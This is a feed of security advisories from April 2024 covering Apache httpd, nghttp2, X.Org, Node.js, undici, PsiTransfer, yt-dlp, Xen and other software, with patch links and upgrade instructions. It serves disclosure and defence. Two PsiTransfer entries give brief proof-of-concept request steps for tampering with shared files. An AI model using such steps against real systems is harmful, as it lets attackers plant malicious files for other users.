04.04.2024 23:15:08alpinelinux[ALPINE:CVE-2024-24795] apache2 vulnerability[From CVE-2024-24795] HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack. Users are recommended to upgrade to version 2.4.59, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24795
04.04.2024 23:15:08alpinelinux[ALPINE:CVE-2024-27316] apache2 vulnerability[From CVE-2024-27316] HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27316
04.04.2024 22:17:04slackware[SSA:2024-095-02] nghttp2 (medium)New nghttp2 packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/nghttp2-1.61.0-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: nghttp2 library keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it can accept after a HEADERS frame. For more information, see: https://github.com/nghttp2/nghttp2/security/advisories/GHSA-x6x3-gv8h-m57q https://www.kb.cert.org/vuls/id/421644 https://www.cve.org/CVERecord?id=CVE-2024-28182 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/nghttp2-1.61.0-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/nghttp2-1.61.0-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/nghttp2-1.61.0-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/nghttp2-1.61.0-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: ec7c0c10fbd8fc955172c165ac83e820 nghttp2-1.61.0-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 83b16e89f34a2b3ab340c4e8be7e013b nghttp2-1.61.0-x86_64-1_slack15.0.txz Slackware -current package: 1344e95b1100f186ed42012881ca29c9 n/nghttp2-1.61.0-i586-1.txz Slackware x86_64 -current package: 03b5154892afcc2f9bfcaee440229252 n/nghttp2-1.61.0-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg nghttp2-1.61.0-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-095-02
04.04.2024 22:16:44slackware[SSA:2024-095-01] httpdNew httpd packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/httpd-2.4.59-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: HTTP/2 DoS by memory exhaustion on endless continuation frames. HTTP Response Splitting in multiple modules. HTTP response splitting. For more information, see: https://downloads.apache.org/httpd/CHANGES_2.4.59 https://www.cve.org/CVERecord?id=CVE-2024-27316 https://www.cve.org/CVERecord?id=CVE-2024-24795 https://www.cve.org/CVERecord?id=CVE-2023-38709 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.59-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.59-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.59-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.59-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: a6e6608bea8071ddfaf5ea39d2454fb9 httpd-2.4.59-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 4fdc451a95e9af68974e472df6d752c1 httpd-2.4.59-x86_64-1_slack15.0.txz Slackware -current package: 1396ecc3cf3e58a8348b7619f0dff361 n/httpd-2.4.59-i586-1.txz Slackware x86_64 -current package: 85c084fc3fda741b121515e011c1db8f n/httpd-2.4.59-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg httpd-2.4.59-i586-1_slack15.0.txz` Then, restart Apache httpd: `# /etc/rc.d/rc.httpd stop` `# /etc/rc.d/rc.httpd start`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-095-01
04.04.2024 21:14:47go[GO-2024-2670] ACL security vulnerability in github.com/hashicorp/nomad (low)An ACL policy using a block without label can be applied to unexpected resources in Nomad, a distributed, highly available scheduler designed for effortless operations and management of applications.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2670
04.04.2024 21:06:26ubuntu[USN-6721-1] X.Org X Server vulnerabilities (high)Several security issues were fixed in X.Org X Server, xwayland.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6721-1
04.04.2024 20:05:16go[GO-2024-2669] API token secret ID leak to Sentinel in github.com/hashicorp/nomad (low)A vulnerability exists in Nomad where the API caller's ACL token secret ID is exposed to Sentinel policies.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2669
04.04.2024 20:01:46maven[MAVEN:GHSA-F8H5-V2VG-46RR] quarkus-core leaks local environment variables from Quarkus namespace during application's build (high)A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application's build. Thus, running the resulting application inherits the values captured at build time. However, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It leads to dangerous behavior if the application does not override these values. This behavior only happens for configuration properties from the `quarkus.*` namespace. So, application-specific properties are not captured.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F8H5-V2VG-46RR
04.04.2024 17:21:20npm[NPM:GHSA-6CF6-8HVR-R68W] dectalk-tts Uses Unencrypted HTTP Request (high)Impact: In `dectalk-tts@1.0.0`, network requests to the third-party API are sent over HTTP, which is unencrypted. Unencrypted traffic can be easily intercepted and modified by attackers. Anyone who uses the package could be the victim of a [man-in-the-middle (MITM)](https://en.wikipedia.org/wiki/Man-in-the-middle_attack) attack. Theft: Because `dectalk-tts` is a text-to-speech package, user requests are expected to only contain natural language. The package [README](https://github.com/JstnMcBrd/dectalk-tts/blob/main/README.md) warns that user input is sent to a third-party API, so users should not send sensitive information regardless. But if users ignore the warnings and send sensitive information anyway, that information could be stolen by attackers. Modification: Attackers could manipulate requests to the API. However, the worst a modified request could do is return an incorrect audio file or bad request rejection. Attackers could also manipulate responses from the API, returning malicious output to the user. Output is expected to be a wav-encoded buffer, which users will likely save to a file. This could be a dangerous entrypoint to the user's filesystem. Patches: The network request was upgraded to HTTPS in version `1.0.1`. No other changes were made, so updating is risk-free. Workarounds: There are no workarounds, but here are some precautions: - Do not send any sensitive information. - Carefully verify the API response before saving it. References: [Vulnerable code](https://github.com/JstnMcBrd/dectalk-tts/blob/b3e92156cbb699218ac9b9c7d8979abd0e635767/src/index.ts#L18) [Original report](https://github.com/JstnMcBrd/dectalk-tts/issues/3) [Patch pull request](https://github.com/JstnMcBrd/dectalk-tts/pull/4)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6CF6-8HVR-R68W
04.04.2024 19:25:33npm[NPM:GHSA-9QXR-QJ54-H672] Undici's fetch with integrity option is too lax when algorithm is specified but hash value is incorrect (low)Impact: If an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered. Patches: Fixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3. Fixes have been released in v5.28.4 and v6.11.1. Workarounds: Ensure that `integrity` cannot be tampered with. References: https://hackerone.com/reports/2377760 https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9QXR-QJ54-H672
04.04.2024 23:24:00npm[NPM:GHSA-M4V8-WQVR-P9F7] Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline (low)Impact: Undici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`. Patches: This has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75. Fixes have been released in v5.28.4 and v6.11.1. Workarounds: use `fetch()` or disable `maxRedirections`. References: Linzi Shang reported this. * https://hackerone.com/reports/2408074 * https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3 https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4V8-WQVR-P9F7
04.04.2024 17:15:10alpinelinux[ALPINE:CVE-2024-31080] xwayland, xorg-server vulnerability (high)[From CVE-2024-31080] A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIGetSelectedEvents() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31080
04.04.2024 17:15:10alpinelinux[ALPINE:CVE-2024-31081] xorg-server, xwayland vulnerability (high)[From CVE-2024-31081] A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31081
04.04.2024 17:15:10alpinelinux[ALPINE:CVE-2024-31082] xorg-server vulnerability (high)[From CVE-2024-31082] A heap-based buffer over-read vulnerability was found in the X.org server's ProcAppleDRICreatePixmap() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31082
04.04.2024 04:36:16ubuntu[USN-6710-2] Firefox regressionsUSN-6710-1 caused some minor regressions in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6710-2
04.04.2024 03:00:00cisa[CISA-2024:0404] CISA Adds 2 Known Exploited Vulnerabilities to CatalogCISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0404
04.04.2024 03:00:00debian[DSA-5655-1] cockpit (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5655-1
04.04.2024 03:00:00freebsd[FREEBSD:57561CFC-F24B-11EE-9730-001FC69CD6DC] xorg server -- Multiple vulnerabilities (high)The X.Org project reports: CVE-2024-31080: Heap buffer overread/data leakage in ProcXIGetSelectedEvents The ProcXIGetSelectedEvents() function uses the byte-swapped length of the return data for the amount of data to return to the client, if the client has a different endianness than the X server. CVE-2024-31081: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice The ProcXIPassiveGrabDevice() function uses the byte-swapped length of the return data for the amount of data to return to the client, if the client has a different endianness than the X server. CVE-2024-31083: Use-after-free in ProcRenderAddGlyphs The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs. ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:57561CFC-F24B-11EE-9730-001FC69CD6DC
04.04.2024 17:40:47android[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
05.04.2024 23:14:40slackware[SSA:2024-096-01] tigervnc (high)New tigervnc packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```extra/tigervnc/tigervnc-1.12.0-i586-6_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including the latest patches for several security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Heap buffer overread/data leakage in ProcAppleDRICreatePixmap. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31082 https://www.cve.org/CVERecord?id=CVE-2024-31083 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-6_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-6_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-5.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-5.txz **MD5 signatures** Slackware 15.0 package: 1b9d9300689d99dc01d93a13bd7ca5f5 tigervnc-1.12.0-i586-6_slack15.0.txz Slackware x86_64 15.0 package: 6b54b9fd74517d203dd671d1bd4adda4 tigervnc-1.12.0-x86_64-6_slack15.0.txz Slackware -current package: ec1ad0a545c495e4a3397db00969ce39 tigervnc-1.13.1-i586-5.txz Slackware x86_64 -current package: 489f6eaadacd1e56f4428dd7e4e5cb5d tigervnc-1.13.1-x86_64-5.txz **Installation instructions** Upgrade the package as root: `# upgradepkg tigervnc-1.12.0-i586-6_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-096-01
05.04.2024 20:15:28npm[NPM:GHSA-2P2X-P7WJ-J5H2] PsiTransfer: File integrity violation (moderate)Summary: The absence of restrictions on the endpoint, which is designed for uploading files, allows an attacker who received the id of a file distribution to change the files that are in this distribution. Details: Vulnerable endpoint: PATCH /files/{{id}} PoC: 1. Create a file distribution. 2. Go to the link address for downloading files and download the file (in this case, the attacker receives the file id from the download request). 3. Send a PATCH /files/{{id}} request with arbitrary content in the request body. Thus, the file with the specified id will be changed. What the attacker specifies in the body of the request will be added to the end of the original content. In the future, users will download the modified file. Impact: The vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2P2X-P7WJ-J5H2
05.04.2024 20:15:29npm[NPM:GHSA-XG8V-M2MH-45M6] PsiTransfer: Violation of the integrity of file distribution (moderate)**Summary** The absence of restrictions on the endpoint, which allows you to create a path for uploading a file in a file distribution, allows an attacker to add arbitrary files to the distribution. **Details** Vulnerable endpoint: POST /files **PoC** 1. Create a file distribution. [screenshot] 2. Go to the link address (id of the file distribution is needed by an attacker to upload files there). [screenshot] 3. Send a POST /files. As the value of the Upload-Metadata header we specify the sid parameter with the id of the file distribution obtained in the second step. In the response from the server in the Location header we get the path for uploading a new file to the file distribution. [screenshot] 5. Send a PATCH /files/{{id}} request with arbitrary content in the request body. Id is taken from the previous step. [screenshot] Result: [screenshot] [screenshot] **Impact** The vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XG8V-M2MH-45M6
05.04.2024 18:03:32go[GO-2024-2683] Improper handling of node names in JWT claims assertions in github.com/hashicorp/consul (high)HashiCorp Consul does not properly validate the node or segment names prior to interpolation and usage in JWT claim assertions with the auto config RPC.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2683
05.04.2024 15:15:37alpinelinux[ALPINE:CVE-2024-31083] xorg-server, xwayland vulnerability (high)[From CVE-2024-31083] A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31083
05.04.2024 02:12:31go[GO-2024-2682] Denial of service via connection starvation in github.com/quic-go/quic-go (high)An attacker can cause its peer to run out of memory by sending a large number of NEW_CONNECTION_ID frames that retire old connection IDs. The receiver is supposed to respond to each retirement frame with a RETIRE_CONNECTION_ID frame. The attacker can prevent the receiver from sending out (the vast majority of) these RETIRE_CONNECTION_ID frames by collapsing the peer's congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2682
05.04.2024 03:00:00freebsd[FREEBSD:C2431C4E-622C-4D92-996D-D8B5258AE8C9] electron{27,28} -- multiple vulnerabilitiesElectron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-2885. Security: backported fix for CVE-2024-2883. Security: backported fix for CVE-2024-2887. Security: backported fix for CVE-2024-2886.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C2431C4E-622C-4D92-996D-D8B5258AE8C9
04.04.2024 23:46:28go[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)The Casa OS Login page has a username enumeration vulnerability in the login page that was patched in Casa OS v0.4.7. The issue exists because the application response differs depending on whether the username or password is incorrect, allowing an attacker to enumerate usernames by observing the application response. For example, if the username is incorrect, the application returns "User does not exist" with return code "10006", while if the password is incorrect, it returns "User does not exist or password is invalid" with return code "10013". This allows an attacker to determine if a username exists without knowing the password.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
05.04.2024 17:40:56android[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
08.04.2024 21:47:56 | slackware | [SSA:2024-099-01] libarchive
New libarchive packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/libarchive-3.7.3-i586-1_slack15.0.txz: Upgraded.
  This update fixes a security issue:
  Fix possible vulnerability in tar error reporting introduced in f27c173 by JiaT75.
  For more information, see:
  https://github.com/libarchive/libarchive/commit/f27c173d17dc807733b3a4f8c11207c3f04ff34f
  https://github.com/libarchive/libarchive/pull/2101
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.3-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.3-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.3-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.3-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
bc692c90578a2481490bb8dafe26c402  libarchive-3.7.3-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
000f0b1f75682c0c075cd946c0f149c9  libarchive-3.7.3-x86_64-1_slack15.0.txz

Slackware -current package:
0d4b64d874931fbbc43c1de33de03c03  l/libarchive-3.7.3-i586-1.txz

Slackware x86_64 -current package:
a08b01ad133cb91972699e1a3e7a432f  l/libarchive-3.7.3-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg libarchive-3.7.3-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-099-01
08.04.2024 14:14:30 | ubuntu | [USN-6722-1] Django vulnerability (critical)
Django accounts could be hijacked through password reset requests.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6722-1

08.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1687] nodejs:20 security update (important)
nodejs
[1:20.11.1-1]
- Rebase to version 20.11.1
- Fixes: CVE-2024-21892 CVE-2024-21896 CVE-2024-22017 CVE-2024-22019 (high)
- Fixes: CVE-2023-46809 CVE-2024-21890 CVE-2024-21891 (medium)
nodejs-nodemon
nodejs-packaging
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1687

08.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1688] nodejs:20 security update (important)
nodejs
[1:20.11.1-1]
- Rebase to version 20.11.1
- Fixes: CVE-2024-21892 CVE-2024-21896 CVE-2024-22017 CVE-2024-22019 (high)
- Fixes: CVE-2023-46809 CVE-2024-21890 CVE-2024-21891 (medium)
nodejs-nodemon
nodejs-packaging
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1688

08.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1692] less security update (moderate)
[590-3]
- Fix CVE-2022-48624
- Resolves: RHEL-26265
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1692
08.04.2024 03:00:00 | redhat | [RHSA-2024:1690] varnish security update (important)
Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.

Security Fix(es):
* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1690

08.04.2024 03:00:00 | redhat | [RHSA-2024:1691] varnish security update (important)
Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.

Security Fix(es):
* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1691

08.04.2024 03:00:00 | redhat | [RHSA-2024:1692] less security update (moderate)
The "less" utility is a text file browser that resembles "more", but allows users to move backwards in the file as well as forwards. Since "less" does not read the entire input file at startup, it also starts more quickly than ordinary text editors.

Security Fix(es):
* less: missing quoting of shell metacharacters in LESSCLOSE handling (CVE-2022-48624)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1692

08.04.2024 03:00:00 | redhat | [RHSA-2024:1687] nodejs:20 security update (important)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.

Security Fix(es):
* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)
* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)
* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)
* nodejs: path traversal by monkey-patching buffer internals (CVE-2024-21896)
* nodejs: multiple permission model bypasses due to improper path traversal sequence sanitization (CVE-2024-21891)
* nodejs: improper handling of wildcards in --allow-fs-read and --allow-fs-write (CVE-2024-21890)
* nodejs: setuid() does not drop all privileges due to io_uring (CVE-2024-22017)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1687

08.04.2024 03:00:00 | redhat | [RHSA-2024:1688] nodejs:20 security update (important)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.

Security Fix(es):
* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)
* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)
* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)
* nodejs: path traversal by monkey-patching buffer internals (CVE-2024-21896)
* nodejs: multiple permission model bypasses due to improper path traversal sequence sanitization (CVE-2024-21891)
* nodejs: improper handling of wildcards in --allow-fs-read and --allow-fs-write (CVE-2024-21890)
* nodejs: setuid() does not drop all privileges due to io_uring (CVE-2024-22017)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1688
08.04.2024 18:45:38 | npm | [NPM:GHSA-R956-2553-VVHR] React Native Sms User Consent Intent Redirection Vulnerability (moderate)
A vulnerability, which was classified as critical, has been found in kyivstarteam react-native-sms-user-consent up to 1.1.4 on Android. Affected by this issue is the function `registerReceiver` of the file `android/src/main/java/ua/kyivstar/reactnativesmsuserconsent/SmsUserConsentModule.kt`. The manipulation leads to improper export of android application components. Attacking locally is a requirement. Upgrading to version 1.1.5 is able to address this issue. The name of the patch is 5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259508.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R956-2553-VVHR

08.04.2024 18:42:15 | maven | [MAVEN:GHSA-2V42-XP3J-47M4] Xuxueli xxl-job template injection vulnerability (low)
A vulnerability classified as problematic was found in Xuxueli xxl-job version 2.4.0. This vulnerability affects the function `deserialize` of the file `com/xxl/job/core/util/JdkSerializeTool.java` of the component `Template Handler`. The manipulation leads to injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259480.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2V42-XP3J-47M4

08.04.2024 16:47:06 | npm | [NPM:GHSA-5PGG-2G8V-P4X9] SheetJS Regular Expression Denial of Service (ReDoS) (high)
SheetJS Community Edition before 0.20.2 is vulnerable to Regular Expression Denial of Service (ReDoS).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5PGG-2G8V-P4X9

08.04.2024 17:39:53 | android | [ASB-A-218495634] Lockdown vs. Screen pinning mode (high)
In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634

10.04.2024 00:16:47 | ubuntu | [USN-6721-2] X.Org X Server regression
A regression was fixed in X.Org X Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6721-2

09.04.2024 21:15:08 | alpinelinux | [ALPINE:CVE-2024-22423] yt-dlp vulnerability (high)
[From CVE-2024-22423] yt-dlp is a youtube-dl fork with additional features and fixes. The patch that addressed CVE-2023-40581 attempted to prevent RCE when using `--exec` with `%q` by replacing double quotes with two double quotes. However, this escaping is not sufficient, and still allows expansion of environment variables. Support for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version 2021.04.11. yt-dlp version 2024.04.09 fixes this issue by properly escaping `%`. It replaces them with `%%cd:~,%`, a variable that expands to nothing, leaving only the leading percent. It is recommended to upgrade yt-dlp to version 2024.04.09 as soon as possible. Also, always be careful when using `--exec`, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous. For Windows users who are not able to upgrade, avoid using any output template expansion in `--exec` other than `{}` (filepath); if expansion in `--exec` is needed, verify the fields you are using do not contain `"`, `|` or `&`; and/or instead of using `--exec`, write the info json and load the fields from it instead.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22423

09.04.2024 19:29:00 | xen | [XSA-455] x86: Incorrect logic for BTC/SRSO mitigations
**ISSUE DESCRIPTION**
Because of a logical error in XSA-407 (Branch Type Confusion), the mitigation is not applied properly when it is intended to be used. XSA-434 (Speculative Return Stack Overflow) uses the same infrastructure, so is equally impacted.
For more details, see:
https://xenbits.xen.org/xsa/advisory-407.html
https://xenbits.xen.org/xsa/advisory-434.html

**IMPACT**
XSAs 407 and 434 are unmitigated, even when the patches are in place.

